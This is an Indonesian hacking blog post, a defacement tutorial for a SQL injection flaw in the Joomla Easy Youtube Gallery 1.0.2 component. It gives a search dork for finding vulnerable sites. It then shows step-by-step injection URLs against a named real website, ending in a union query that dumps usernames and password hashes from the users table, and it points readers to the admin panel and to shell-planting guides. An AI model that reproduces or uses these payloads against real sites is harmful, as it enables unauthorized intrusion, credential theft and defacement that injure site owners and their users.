Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
yoii kali ini kita maen suntik2an di CMS Joomblo.

Oke langsung Aja gay gak usah banyak ~~coli~~ cocote

Dork :

inurl:com_easy_youtube_gallery mycategory

(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

1. Kita Search Dork nya menggunakan search engine

2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN

3. Sekarang kita coba cari errornya dimana.
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120 // masih normal lagee

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~

Kolomnya cuman sampe 14 gannn

4. Oke lanjut ke step berikutnya, kita cari angka ajaibnya :D

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=-0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=120

Nah, angka ajaibnya Keliatan Gay :v

5. Oke biar gampang, saya pake DIOS nya mas madblood /-\

Nah keliatankan Isi daleman web nya ?:v

6. Sekarang kita liat lebih dalem lagi gimana? :v

Tuh DALEMANNYA keliatan gann :v

Terus abis itu diapain , kalo dh keliatan dalemannya ? , buka tusuk -> crotz di dalem..

Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120

Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/

Baca juga, tutorial cara menanam Shell di CMS Joomla: Cara Deface Com_User Auto Exploiter dan Cara menanam shell di CMS Joomla

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.

source and thanks to: 0day

Call Me Sayang A.K.A 3xBitch

tidak perlu muncul ke permukaan , yang penting tetap bergerilya

Visit and follow :

FP : TKJ Cyber Art

G+ : TKJ Cyber Art

youtube : TKJ Cyber Art

BBM : C0018D1A2

Line : http://line.me/ti/p/%40hjl8740i

ande ande lumoet

Pages

Rabu, 11 Mei 2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

0 komentar:

Posting Komentar

Popular Posts

Blogger templates

Blogroll

Blog Archive

Labels

Cari di Sini

Laporkan Penyalahgunaan

Mengenai Saya

Cara Menyembunyikan Wifi / SSID pada Modem ZTE